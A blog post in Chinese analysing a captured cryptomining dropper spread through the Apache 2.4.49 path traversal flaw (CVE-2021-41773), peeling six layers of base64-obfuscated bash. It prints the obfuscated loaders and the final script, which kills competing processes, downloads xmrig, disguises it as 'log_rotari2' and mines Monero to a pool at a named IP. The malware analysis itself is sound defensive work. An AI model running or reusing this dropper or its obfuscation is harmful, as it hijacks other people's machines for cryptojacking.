捕获挖矿脚本分析

(1)详细说明

近日我捕获到一个利用Apache2.4.49漏洞(CVE-2021-41773)传播xmrig-6.14.1-linux-static-x64挖矿脚本的最新样本。样本文件名为aaa,file命令判断为ASCII脚本。如下图所示:

 image.png
直接cat该文件

(2)样本分析

I. 该bash脚本经过混淆,将eval改为print,调试脚本

第一遍运行得到
bash -c "$(base64 -d <<< "\YmFzaCAtYyAiJChiYXNlNjQgLWQgPDw8ICJcClltRnphQ0F0WXlBaUpDaGlZWE5sTmpRZ0xXUWdQRHc4SUNKY0NsbHRSbnBoUTBGMFdYbEJhVXBEYUdsWldFNXNUbXBSWjB4WFVXZFEKUkhjNFNVTktZME5zYkhSU2JuQm9VVEJHTUZkWWJFSmhWWEJFWVVkc1dsZEZOWE5VYlhCU1dqQjRXRlZYWkZFS1VraGpORk5WVGt0WgpNRTV5WWtSV1UxZEdjR0ZaYkdRMFRWWlNSVlJyT1dsTlJUVXhWVmMxZDFOc1NYZFhXR2hoVmxVMVJGUXdWbk5UUm5CSllrZEZTMVl3ClZrZGliRkpIWVVkR1RncE5SM2hKV2xWb1lWbFZNVlZpUkZaYVlXczFWRmxWWkU5a1IwVjZZa1Z3VkZOSFVuVldNVnB2WVRKT2NtSkYKVW1GU1IxSnZWbXBHYzJSc1RuSlZhelZNVFVSV1JsVldhRlpUTVZKV0NsUnVTbUZOYXpWS1ZUSTFRMkZSY0dsaVJWcDFWVEowVTFNdwpPVlpqUkZaU1ZUTlNTMVZZY0hKa01XeHpZVVZLYTJKVk5VcFZNalZoVjIxV1ZsSnVVbFJpVjNoRVZGUktSMU5IU2trS1ZHMUdWazFGCmJ6RldNbmhyVWpKRmQySkZiRkppYlhod1ZGZHpNV1F4WkhKVmJuQmhUVmhDU1VOck9VaGFSMmhPWWxob05sZFhkRTlSYlZKQ1kwWkMKVmsxRldubFhWRUp2VXpKU2N3cGhNMnhwVWpOU1VWcFdWa3RqYkd4eFUxUkdhVkpYZUVaYVJFcHJWRlV3ZUZOcVFscE5SVEF4V2tSSwpUMlJGT1ZoalJWSnBZVEJ2TWxVeFZrNWxSMHBYWTBaUlMxVlhjRzlUYkVsNUNsVnFWbGhpUjJoRFYycENORmRXYTNsYVIyeFRaVzE0Ck1WWXdVazlUTWxKMFZXdG9VMkp0ZUc5V2ExWnpZbXRPZEZkclVsSmlWRlp4V1d4YVlVMHhUbFpVV0doT1lUSjRTVmRyYUhNS1dWWmsKUmxKcmVGcFdiVkpoVjJwR2EwNVJjRkpXTTFKU1dsWldSMDFHWkhOaFJWcGhUVVJHUlZWWE1WTlNSMHB6VTI1YVdHSkhUWGRWZWtwUApVMVp3U0dSRlVtbFdiSEEyVjFod1N3cFdiRTE1Vld4b2JGTkZTbkJXYWtvelpERk9WbFJZYUd0V1YzaEdWakZTUmxNeFVuTlZhelZPClZsVTFNRU5zVW5GU2JYQnBWMGRTZFZaRldrNWxSMVpYWTBac1ZXSnNjSEJWTUZwM0NtTXhUbFphUjNScVVqRktTVmxWVWtkWGJVWlYKVm01R1dtRnJiRE5VYlhNeFVsWldXV05HUW1oaE1WWXpWa1pXVGsxRk5VWk5XRUpQVTBkb1QxbFhkRmROVmxKeVZHdEpTMXBGWkVzSwpUbFpHV1ZkdGRGTmxhMWw2VmtWU1MwNUhVbTVqUjBaT1ZrZDNNVmRYY0U5Vk1rWklWRzVTYUUweWVFNVpiWGhMWWpGcmVXRjZSbWxpClZscDNWVlpvVTFaV1JYZFRibHBoVWxkb1ZBcGFSRXBQVG0xSmVsZHJNVTVpVmtvelYydFdhMkozY0U1V2JYaDNWR3hrZDJGVk1YRlIKYWtwaFZsZE9ORnBXWkVkWFJtdDZWMjE0VTJWcldURlhWbHByWVcxU2RGUnVVbGRpYXpWb0NsWnFRbUZPYTA1elkwWnNWVmRHY0doVgpibkJ5Wld4c2RFMVVVbXRpUjNoWlZsWm9ZV0V5Um5OaVJFWlZWbXhLVTBOdFVsWk5WbEpRVmtaS2NGWXdWbmRrTVdSMVlUTmtUbUV6CmFIZ0tWV3hTUTFSWFJuSldha0phWVRKU2VscEdaRk5YVm05NlZXMXdUazFWY0haWGExWnJZekpHY21WR2JHRmxhM0JRVlZod1ZtUXgKWkZkaFJYQnJWbTA1TmxscVNtcFRNVVY1VFZVNFN3cFpWRUp6VWtVNVZWRnRiRmhTVlZwTlYydFdhMUl5VmxaaVJXeG9Va1Z3YUZsdApNRFZpYkd4eVdYcFdhV0pIWkRaVk1qVmhZVEZKZDFkcVZscFdiRXBMV2taa1UxTkdTblZpUlRGcENsWXhSWGxWVkVsNFZESkZkMkpGCmJHaFRSa3B4V1d4a05HUlJjRlZTYkVwaFdrWlZlRlpXVmxsV2F6VldWMFZKZDFkclpITlJNRFZDWTBkc1dGSllRak5XTWpWelVUSk4KZVZOWWJHRUtVakZ3Y1Zsc1VuSmtNV1JYWVVWMGFsSlVSblZaTUdSM1lVWktObEpxU2xoaE1EVkRWRlJCTVU1c2EzbGFSMnhUWlcxNApNVU5zWkVWVWEzUnJZbFpLU1ZWdE5YTmhSbHBHWWtWNFZRcFNNbk14V1hwS1NtVldjRWhYYlhCcFZrZDBNMVl4V205VE1rNUdUVmhDClVsZEdTazVXYWtFeFRXdE9kRkpzYUU5U01sSndWbTV3YzAxV1pITmhSWFJyWVRKNFJWUldhR0ZUYkVwR0NsWllZMHRXUmxwT1RVZFcKUmsxVlZsZFhSbHBRV1ZkNFYwMVdVbGRWYTBwUFVsUnNlRlpHYUhkVWJWWnlUVmMxVlZKdGFGZFhha3BMVTBkS1NWWnRkRmhTTWxKMQpWa1ZhYjFGc2Iza0tVMnRvYVZOR1duSldNR1JyWW14U1IxUllhR3RXTUZwWlZrY3hNMU4zY0ZwV1YxSklXbGN4UjFKR1JsbFZhekZYClRWVnZlVmRYTUhoU01ERkhZMFpTVGxkRk5XaFdNRnAzWXpGc2NncFZXR1JyVFVkNFJWUlZhRk5YYXpCM1UxaG9WVkp0YUVSYVZtUkgKVjBVNVdXSkhhRmhTYTJ0NFZsVmFVMVpzYjNkaVJWSk9WMFZ3UzBOc1JqWlNhMUpVVmxaRmQxcEhlSGRUUmxweENsTnJNVTVoYkZZMApWMWQwYTAweGNETmpSWFJoVFRCSk1sZFhkR3RXTWtwSVZHdFNVbGRIYUU5VmExWkhUVEZGZVU1VmRHdFNWM2hGVkZab2MxbFhSbFpTCmFrcGhVbGRPTkZwRVFqTUtaVzFHU1ZWdGIwdFpiR1EwWkZaU1IxVnNjR3RXVkVaV1ZsWm9WMVJzVmxsUmFsWmFZa1UxUTFwRlpFOWsKUm1SWVdrVXhUazFWYjNkWFZFSk9UbGROZVZOWWJHRlNNWEJ4V1d4U2NncGtNRTV6WWtac1ZHSnJTazlaVmxKV1pERmtWMkZGY0d0VwpiVGsyV1dwQ01GbFJjR2xXTTFKTlZqSjRhMVF5U1hsVGFsWlNWako0Y1ZsdGVHRk5WbXhYV1hwR2FXRXphSGRVYTJoWENsUlhSbFZWCmJrSlNUVzFOTlZWR1RrcGpSV3h3VVcxc1dsZEZOWFpUVlU1S1lURkdSRk5WYzJsTFUwbG5XVzFHZW1GRFFXbEtSVUZwUTJjOVBTSXAKSWlCaVlYTm9JQ0lrUUNJSyIpIiBiYXNoICIkQCIK")" bash "$@"

II. 提取其中base64,去掉换行符,解base64继续运行得到

bash -c "$(base64 -d <<< "\
YmFzaCAtYyAiJChiYXNlNjQgLWQgPDw8ICJcClltRnphQ0F0WXlBaUpDaGlZWE5sTmpRZ0xXUWdQ
RHc4SUNKY0NsbHRSbnBoUTBGMFdYbEJhVXBEYUdsWldFNXNUbXBSWjB4WFVXZFEKUkhjNFNVTktZ
ME5yYkRWU1dGcGFZbGQ0TVZSRVRrOWlNRTUxVVc1d1NsSXdXWGhhVlU1RFQwVnNTRnBJYkdFS1Yw
VkdibFJHYUdGTgpNR3hJWlVoYVlVMVViRFZaYWs1VFlVZE9kR0V6YkVwVFNHUnVWMVpvYTJOcmJF
UmFSR1JvVmpGc2RsTnJVazVMTURWRlVWaFZTMVJWClRuSmFNazVKVTI1Q2FRcGliRVp1VTJ0U1Mw
OVZjRFZSVTNSS1VYcHJkMWxzYUVKa2JVNUpVMjVhV21WVlJuUlRiV3hEVFRKR1NHSkkKVG1GVk1F
bzFWMnhrUjJFd2JFbFJibXhwVFdzMWQxZHJVbnBhTVhCSUNrOUhaR2hOYlhoNldXdE9RbVJCY0ZC
Vk1FWnlXVEJvUzJScwphM2xpUjNSUVpWVktjbGxxU1RGaVJXeEZaREprVFUweFNqQlpNRTAxWkRK
T2RFOVhjRVJpYTBvMlUxVk5lR0pXY0ZRS1VXcG9TbEl5ClVqVlhiR2hDV2pCNFdWa3laR2xTZW14
MVYwUk9TMlJ0VWtoU2JteG9Wa1ZzYmtOdFdrUlJiVFZxWWxaYU0xTlZUWGhOYTJ4SVdraHMKWVZk
RlJreFpWbVJhV2pGa05RcFJWM1JSWlZWR01GZHNhRVphTURGRVVXMVNSR0pzU25aWGJHTXdVekpP
U1ZwSGRFUmlWbHA2V1hwSwpWbE15VWxobFNFSnBWakozZDFOVlRYaGtWV3hGVjFSRlMxUnNVazVO
VlU1MENsUnFSbXBpV0dSdVZFWk5lR1ZXY0ZsVWJscHBVMFp3CmMxTlZaR3RqUjFKSVlVUkdXbUZV
Vm5GWmFrbDNUbXMxUlZWWWNGQmhhMVYzVkZWTk1FNUZNWEJPU0doT1lXdFdNVlJyVGtJS1pFZEsK
TlZGWVdtdFNla1l6VkVSS05HUm5jR0ZOVkd3MVdXcE9VMkZIVG5SaE0yeE5ZbXhLYjFreWF6Rmli
Vlp3VVZoU1ZWRXdTblphUldoVApaREpPTm1JeldrMU5iVkozV2tWa2J3cE5WbXh3VGxkd2FVMXFR
akphVldONFpWZEdXRmt6V214U2VrWTFXVlprYW1SdFRuUldiazVoClZqQmFOa05zY0ZsVVdGcGhV
bnByZWxsdE1UUmtiR3hZVlZoYWEyRnNiREZVVmxKU0NtUlZNVlJQVkZKcFYwVndkMWR1YTNkTmEz
aHgKVWxSQ1RXRnJWakJaYTJSelpGZFNXVm96VW1wTk1VcHZXa1ZrYzJGcmVGbGFla3BQVVhwVmQx
ZFdhRXBrVm05NllqSmpTMUV5TVU4SwpZVEJzUkU5VVFtbFhSVVpNV2tWa1IyVlZiRWxoUkVwaFlt
MDVibGxyWXpWaWJHZDZVMjVhYTFJd1dqVlpWbEpLWkZkU1NGSnViRTFpClYxRXlVVEl4VDJFd2JF
bGhTRkpxWWxkNGRRcFVSbEphWkZVeFZWVllWazVWV0VJd1drZHNRMDVCY0dsWFJYQjNWMjVzUTJN
eVNYbGEKUjFwcVlsUnJkMWRXYUV0alJURnVZMGR3YUZKNlJqSlhhMDVDVFRBMU5sa3laR2xTZW14
MUNsZEVUa3RrYlZKSVVtNXNhRlpGYkV4VQpSMnMxWXpKSmVWcEhXbXBpVkd0M1YxWm9TMk5GTVhC
UldGSk5WakExTWtOdFJsaE9SMlJwVm5wc01WZHNhRXRrYTJ4RVRWaGFTbEpGClZYY0tWRlpOTUdW
Rk1VVldXRlpQWVd4V01WUldVa0pPUlRseFZGaHdUbVZyTVc1VVJtaFdXakpLU0dKSVZtdFhSMlJ1
VkVab1Fsb3kKU2toaVNGWnJWMGRrYmxSR1RYaGtWMFpZVkcxM1N3cFpWV1JIWlcxR1JGRllVazFX
TVVveVdXMHhSMDFHY0ZSTldFNWhWMFp3YzFscgpVWGRrTUd4RVRVaFNXazB3U1hoVVJtaERaVmRH
V0U5WWJHaFhSa2t4VlVaU1Zsb3diRVJOV0VwS0NsRjZSa1JUVlZFd1pHeHdTRlpxClNrMU5hbFY0
V1d0a00xcDNjRXRhTTBJMldXdGtWMkpIVGtSUldHaE9Va1ZHTTFFeU5VdGtSV3hFVFZoc1lXRlZS
akphUldONFpEQjMKZW1GSVVtb0tZbGQ0ZFZSR1VscGtWVEZWVlZoV1RsVllRalZaYkU1Q1pFZE9k
RmRYWkUxTk1Vb3dXVEJOTldNeVNYbGFSMXBxWWxScgpkME5zYkZsVGJrSk9ZVlJWZDFkV2FFcGtW
bTk2WWpCMFlRcGlWM1JNVjJ4a1QySXlTalZSVjJ4cVlteGFNVmxXWXpGaWEzaHdUa2hXClRXRlVV
bkJSTW1NNVVGTkpjRWxwUW1sWldFNXZTVU5KYTFGRFNVc2lLU0lnWW1GemFDQWlKRUFpQ2c9PSIp
IiBiYXNoICIkQCIK")" bash "$@"

III. 提取其中base64,去掉换行符,解base64继续运行得到

bash -c "$(base64 -d <<< "\
YmFzaCAtYyAiJChiYXNlNjQgLWQgPDw8ICJcClltRnphQ0F0WXlBaUpDaGlZWE5sTmpRZ0xXUWdQ
RHc4SUNKY0NrbDVSWFpaYld4MVRETk9iME51UW5wSlIwWXhaVU5DT0VsSFpIbGEKV0VGblRGaGFN
MGxIZUhaYU1UbDVZak5TYUdOdGEzbEpTSGRuV1Zoa2NrbERaRGRoVjFsdlNrUk5LMDVFUVhVS1RV
TnJaMk5JU25CaQpibEZuU2tSS09VcDVRU3RKUXprd1lsaEJkbU5JU25aWmVVRnRTbWxDTTJGSGJI
TmFVMEo1V2xkR2EwbElRbmxpTWs1d1drUnpaMXBICk9HZGhNbXh6WWtOQmRBcFBVMEZyWTBoS2Rs
a3liR3RQZVVKcllqSTFiRWxFZDJkTU0xSjBZME01ZDJOdE9XcERia0o2U1VNeGJWcFQKUWpoSlIy
UjVXbGhCWjB4WVkyZGlSemx1V0ROS2RtUkhSbmxoVkVsbkNtWkRRbTVqYlZaM1NVTXhNa2xIWkhs
YVdFRkxZVmRaWjFkNQpRV3RRZVVGMFdsaEZaMDFEUW1SRGJsSnZXbGMwUzJOSVpHdERiVlp6WXpK
VlMyUlhlSEJpVjJ3d1NVTXhkVWxFV1RFS1RsUk5NVU50ClRqRmpiWGRuVEZNeGVWcFlUblppU0Zw
c1NVZGtjR1JIYURGWmFUVnFZakl3Tms1RVVYcFBha1V3VFVNME5FMXBOSGhOYWtWMVRrTkIKZEdK
NVFYWmtSekYzVERKNGRncGFNVGw1WWpOU2FHTnRhM2xNYmxKb1kyazFibVZwUVhSVVEwSnZaRWhT
ZDJONmIzWk1NbVJ3WkVkbwpNVmxwTldwaU1qQjJaVWN4ZVdGWFkzWmxSekY1WVZkamRtTnRWbk5h
VjBaNkNscFlUWFphUnprelltMTRkbGxYVVhaa2FsbDFUVlJSCmRVMVRPVFJpV0Vwd1dua3dNa3hx
UlRCTWFrVjBZa2RzZFdSWVozUmpNMUpvWkVkc2FreFlaekpPUXpVd1dWaEpkVm96YjJjS1EyMU8K
YTBsRE9UQmlXRUZMWkVkR2VVbElhREphYm05bllrYzVibGd6U25aa1IwWjVZVlJKZFdSSFJubE1i
V1EyUTIxT2EwbElhSFJqYld4dQpURlJaZFUxVVVYVk5VWEIwWkdsQ05BcGlXRXB3V25sQ2MySXla
R1pqYlRrd1dWaEtjRTFuY0dwaFJ6RjJXa05CTTA1NlkyZGlSemx1CldETktkbVJIUm5saFZFbExU
R2s1YzJJeVpHWmpiVGt3V1ZoS2NFMXBRWFJNVjA1MkNtRlhOR2RpVnpsMVdsaEtka2xETVhaSlJF
VXcKVFZNMGVFMUVWWFZPYWxWMVRWUkJORTlxVFhwTmVrMW5URmhWWjJKSGJIVmtXR2RuVEZoQloy
SkhiSFZrV0dkblRGTXhkV0ZYVG13SwpZVWRHZW1GRFFYUk1WMUoyWW0xR01GcFRNWE5hV0Zwc1lr
UXdkMGxETUhSWk0wSXhURmhDZVdGWE9YbGhXRkkxVUZSVlowbERNWEpKClF6RkRTVVEwZGxwSFZq
Sk1NalV4WWtkM1p3cEtaM0I2WWtkV2JHTkRRWGhOUkVGM1EyNUtkRWxETVhsYWFVRjJaRWN4ZDB3
emFIUmoKYld4dVRGUlpkVTFVVVhWTlVYQjVZbE5CZEdOdFdXZE1NMUowWTBNNWMySXlaR1pqYlRr
d0NsbFlTbkJOYVRVd1dWaEpkVm96YjB0YQpiV3RMV2xkT2IySjVRV2xqYmxaMVlWYzFia3hwTkhW
TWFUUnBRMmM5UFNJcElpQmlZWE5vSUNJa1FDSUsiKSIgYmFzaCAiJEAiCg==")" bash "$@"

IV. 提取其中base64,去掉换行符,解base64继续运行得到

bash -c "$(base64 -d <<< "\
YmFzaCAtYyAiJChiYXNlNjQgLWQgPDw8ICJcCkl5RXZZbWx1TDNOb0NuQnpJR0YxZUNCOElHZHla
WEFnTFhaM0lHeHZaMTl5YjNSaGNta3lJSHdnWVhkcklDZDdhV1lvSkRNK05EQXUKTUNrZ2NISnBi
blFnSkRKOUp5QStJQzkwYlhBdmNISnZZeUFtSmlCM2FHbHNaU0J5WldGa0lIQnliMk5wWkRzZ1pH
OGdhMmxzYkNBdApPU0FrY0hKdlkybGtPeUJrYjI1bElEd2dMM1J0Y0M5d2NtOWpDbkJ6SUMxbVpT
QjhJR2R5WlhBZ0xYY2diRzluWDNKdmRHRnlhVElnCmZDQm5jbVZ3SUMxMklHZHlaWEFLYVdZZ1d5
QWtQeUF0WlhFZ01DQmRDblJvWlc0S2NIZGtDbVZzYzJVS2RXeHBiV2wwSUMxdUlEWTEKTlRNMUNt
TjFjbXdnTFMxeVpYTnZiSFpsSUdkcGRHaDFZaTVqYjIwNk5EUXpPakUwTUM0NE1pNHhNakV1TkNB
dGJ5QXZkRzF3TDJ4dgpaMTl5YjNSaGNta3lMblJoY2k1bmVpQXRUQ0JvZEhSd2N6b3ZMMmRwZEdo
MVlpNWpiMjB2ZUcxeWFXY3ZlRzF5YVdjdmNtVnNaV0Z6ClpYTXZaRzkzYm14dllXUXZkall1TVRR
dU1TOTRiWEpwWnkwMkxqRTBMakV0YkdsdWRYZ3RjM1JoZEdsakxYZzJOQzUwWVhJdVozb2cKQ21O
a0lDOTBiWEFLZEdGeUlIaDJabm9nYkc5blgzSnZkR0Z5YVRJdWRHRnlMbWQ2Q21Oa0lIaHRjbWxu
TFRZdU1UUXVNUXB0ZGlCNApiWEpwWnlCc2IyZGZjbTkwWVhKcE1ncGphRzF2WkNBM056Y2diRzlu
WDNKdmRHRnlhVElLTGk5c2IyZGZjbTkwWVhKcE1pQXRMV052CmFXNGdiVzl1WlhKdklDMXZJREUw
TVM0eE1EVXVOalV1TVRBNE9qTXpNek1nTFhVZ2JHbHVkWGdnTFhBZ2JHbHVkWGdnTFMxdWFXTmwK
YUdGemFDQXRMV1J2Ym1GMFpTMXNaWFpsYkQwd0lDMHRZM0IxTFhCeWFXOXlhWFI1UFRVZ0lDMXJJ
QzFDSUQ0dlpHVjJMMjUxYkd3ZwpKZ3B6YkdWbGNDQXhNREF3Q25KdElDMXlaaUF2ZEcxd0wzaHRj
bWxuTFRZdU1UUXVNUXB5YlNBdGNtWWdMM1J0Y0M5c2IyZGZjbTkwCllYSnBNaTUwWVhJdVozb0ta
bWtLWldOb2J5QWljblZ1YVc1bkxpNHVMaTRpQ2c9PSIpIiBiYXNoICIkQCIK")" bash "$@"

V. 提取其中base64,去掉换行符,解base64继续运行得到

bash -c "$(base64 -d <<< "\
IyEvYmluL3NoCnBzIGF1eCB8IGdyZXAgLXZ3IGxvZ19yb3RhcmkyIHwgYXdrICd7aWYoJDM+NDAu
MCkgcHJpbnQgJDJ9JyA+IC90bXAvcHJvYyAmJiB3aGlsZSByZWFkIHByb2NpZDsgZG8ga2lsbCAt
OSAkcHJvY2lkOyBkb25lIDwgL3RtcC9wcm9jCnBzIC1mZSB8IGdyZXAgLXcgbG9nX3JvdGFyaTIg
fCBncmVwIC12IGdyZXAKaWYgWyAkPyAtZXEgMCBdCnRoZW4KcHdkCmVsc2UKdWxpbWl0IC1uIDY1
NTM1CmN1cmwgLS1yZXNvbHZlIGdpdGh1Yi5jb206NDQzOjE0MC44Mi4xMjEuNCAtbyAvdG1wL2xv
Z19yb3RhcmkyLnRhci5neiAtTCBodHRwczovL2dpdGh1Yi5jb20veG1yaWcveG1yaWcvcmVsZWFz
ZXMvZG93bmxvYWQvdjYuMTQuMS94bXJpZy02LjE0LjEtbGludXgtc3RhdGljLXg2NC50YXIuZ3og
CmNkIC90bXAKdGFyIHh2ZnogbG9nX3JvdGFyaTIudGFyLmd6CmNkIHhtcmlnLTYuMTQuMQptdiB4
bXJpZyBsb2dfcm90YXJpMgpjaG1vZCA3NzcgbG9nX3JvdGFyaTIKLi9sb2dfcm90YXJpMiAtLWNv
aW4gbW9uZXJvIC1vIDE0MS4xMDUuNjUuMTA4OjMzMzMgLXUgbGludXggLXAgbGludXggLS1uaWNl
aGFzaCAtLWRvbmF0ZS1sZXZlbD0wIC0tY3B1LXByaW9yaXR5PTUgIC1rIC1CID4vZGV2L251bGwg
JgpzbGVlcCAxMDAwCnJtIC1yZiAvdG1wL3htcmlnLTYuMTQuMQpybSAtcmYgL3RtcC9sb2dfcm90
YXJpMi50YXIuZ3oKZmkKZWNobyAicnVuaW5nLi4uLi4iCg==")" bash "$@"

VI. 提取其中base64,去掉换行符,解base64继续运行得到

#!/bin/sh
ps aux | grep -vw log_rotari2 | awk '{if($3>40.0) print $2}' > /tmp/proc && while read procid; do kill -9 $procid; done < /tmp/proc
ps -fe | grep -w log_rotari2 | grep -v grep
if [ $? -eq 0 ]
then
pwd
else
ulimit -n 65535
curl --resolve github.com:443:140.82.121.4 -o /tmp/log_rotari2.tar.gz -L https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-static-x64.tar.gz 
cd /tmp
tar xvfz log_rotari2.tar.gz
cd xmrig-6.14.1
mv xmrig log_rotari2
chmod 777 log_rotari2
./log_rotari2 --coin monero -o 141.105.65.108:3333 -u linux -p linux --nicehash --donate-level=0 --cpu-priority=5  -k -B >/dev/null &
sleep 1000
rm -rf /tmp/xmrig-6.14.1
rm -rf /tmp/log_rotari2.tar.gz
fi
echo "runing....."

VII.共解六次base64,获取明文命令,查看命令,发现下载了https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-static-x64.tar.gz 挖矿脚本并连接地址141.105.65.108:3333 

posted @ 2021-11-01 16:35  r1ch4rd_L  阅读(903)  评论(2编辑  收藏  举报